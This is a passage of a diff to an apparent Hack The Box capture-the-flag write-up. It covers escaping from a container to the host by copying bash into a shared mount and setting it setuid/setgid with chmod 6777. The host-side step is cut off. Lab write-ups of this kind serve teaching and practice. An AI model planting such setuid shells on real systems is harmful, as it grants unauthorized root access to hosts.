mintyph/mintyph.github.io/_posts/2025-10-17-htb-forgotten-writeup.md

 ### Privilege Escalation

 We had root on the container but lacked host-level privileges.
 Enumeration revealed a directory mounted into both the container and the host.
-By placing a privileged shell binary into that shared directory, we were able to escalate privileges and obtain root on the host
+By placing a privileged shell binary into that shared directory, we were able to escalate privileges and obtain root on the host.
-On the container:
+On the container we run:

 ```
 root@efaa6f5097ed:/var/www/html/survey# cp /bin/bash .
 root@efaa6f5097ed:/var/www/html/survey# chmod 6777 bash
 ```

 On the host:

 ```